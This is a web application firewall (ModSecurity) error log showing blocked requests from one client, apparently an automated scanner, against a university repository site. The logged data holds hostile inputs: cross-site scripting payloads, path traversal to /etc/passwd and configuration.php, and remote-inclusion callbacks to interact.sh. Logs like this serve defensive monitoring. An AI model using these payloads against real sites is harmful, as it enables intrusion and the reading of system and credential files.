[Tue Aug 29 11:51:06.193211 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO15OsCo-f0AAAknEMUAAAAB"]
[Tue Aug 29 11:51:08.635792 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:log: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO15PMCo-f0AAAnB5ToAAAAJ"]
[Tue Aug 29 11:51:08.639351 2023] [:error] [pid 2499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:errors[fu-disallowed-mime-type][0][name]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:errors[fu-disallowed-mime-type][0][name]: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO15PMCo-f0AAAnDFxoAAAAM"]
[Tue Aug 29 11:51:09.561236 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:country. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:country: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15PcCo-f0AAAnIlewAAAAV"]
[Tue Aug 29 11:51:09.588953 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:settingsform[firstname]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:settingsform[firstname]: pdteam' onclick='alert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/install.php"] [unique_id "ZO15PcCo-f0AAAkr0D0AAAAC"]
[Tue Aug 29 11:51:10.743560 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/tools/sourceViewer/index.html"] [unique_id "ZO15PsCo-f0AAAfWOC8AAAAL"]
[Tue Aug 29 11:51:11.569122 2023] [:error] [pid 2498] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:category: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15P8Co-f0AAAnCKxkAAAAK"]
[Tue Aug 29 11:51:12.807404 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/changedResource.jsp"] [unique_id "ZO15QMCo-f0AAAknENsAAAAB"]
[Tue Aug 29 11:51:13.549233 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15QcCo-f0AAAfWODUAAAAL"]
[Tue Aug 29 11:51:13.659706 2023] [:error] [pid 2424] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:');alert("XSS. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS_NAMES:');alert(\\x22XSS: ');alert(\\x22XSS"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/commitGraph.jsp"] [unique_id "ZO15QcCo-f0AAAl4sXUAAAAf"]
[Tue Aug 29 11:51:14.737405 2023] [:error] [pid 2489] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dflink. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:dflink: ../../../configuration.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15QsCo-f0AAAm5Bw0AAAAA"]
[Tue Aug 29 11:51:14.760476 2023] [:error] [pid 2489] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/commitGraph.jsp"] [unique_id "ZO15QsCo-f0AAAm5Bw4AAAAA"]
[Tue Aug 29 11:51:15.663512 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15Q8Co-f0AAAmHd9kAAAAz"]
[Tue Aug 29 11:51:15.676648 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15Q8Co-f0AAAkyyEAAAAAW"]
[Tue Aug 29 11:51:16.029693 2023] [:error] [pid 2424] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:errormessage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:errormessage: '\\x22><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/error.jsp"] [unique_id "ZO15RMCo-f0AAAl4sXwAAAAf"]
[Tue Aug 29 11:51:16.548247 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:graph. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:graph: \\x22zlo onerror=alert(1) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/php/device_graph_page.php"] [unique_id "ZO15RMCo-f0AAAjdQToAAAAZ"]
[Tue Aug 29 11:51:16.577608 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/statsItem.jsp"] [unique_id "ZO15RMCo-f0AAAkyyEQAAAAW"]
[Tue Aug 29 11:51:17.604392 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:api_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:api_url: api_url'><script>alert(document.domain)</script> "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php"] [unique_id "ZO15RcCo-f0AAAfWOD8AAAAL"]
[Tue Aug 29 11:51:17.847573 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:path: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15RcCo-f0AAAnIlfcAAAAV"]
[Tue Aug 29 11:51:20.557368 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x22>< found within ARGS:id: </form><iMg src=x onerror=\\x22prompt(document.domain)\\x22><form>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/Forms/rpAuth_1"] [unique_id "ZO15SMCo-f0AAAnHQdcAAAAT"]
[Tue Aug 29 11:51:20.647589 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:id: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/phpmyadmin/setup/index.php"] [unique_id "ZO15SMCo-f0AAAmNp30AAAAQ"]
[Tue Aug 29 11:51:21.539937 2023] [:error] [pid 2493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:RESULT. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );// found within ARGS:RESULT: \\x22,msgArray);alert(document.domain);//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/info.php"] [unique_id "ZO15ScCo-f0AAAm91m8AAAAG"]
[Tue Aug 29 11:51:21.596726 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/setup/index.php"] [unique_id "ZO15ScCo-f0AAAjdQT8AAAAZ"]
[Tue Aug 29 11:51:21.719870 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:searchOwnerUserName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:searchOwnerUserName: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/secure/ConfigurePortalPages!default.jspa"] [unique_id "ZO15ScCo-f0AAAlUliQAAAA0"]
[Tue Aug 29 11:51:22.933057 2023] [:error] [pid 2493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword"] [unique_id "ZO15SsCo-f0AAAm91nEAAAAG"]
[Tue Aug 29 11:51:22.964139 2023] [:error] [pid 2352] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:filtervalue. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:filtervalue: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/Portal/Portal.mwsl"] [unique_id "ZO15SsCo-f0AAAkwQXAAAAAS"]
[Tue Aug 29 11:51:22.968541 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/api/sso/v2/sso/jwt"] [unique_id "ZO15SsCo-f0AAAjdQUIAAAAZ"]
[Tue Aug 29 11:51:23.547499 2023] [:error] [pid 2443] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:err. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -->< found within ARGS:err: --><script>alert('2Ue0IThdcrNit2de4iq3Tr8D1X0')</script><!--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/remote/login"] [unique_id "ZO15S8Co-f0AAAmLPSoAAAAN"]
[Tue Aug 29 11:51:23.781545 2023] [:error] [pid 2502] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:viewSurveyError. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:viewSurveyError: Unknown survey\\x22><img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/Main/Default.aspx"] [unique_id "ZO15S8Co-f0AAAnGkIMAAAAR"]
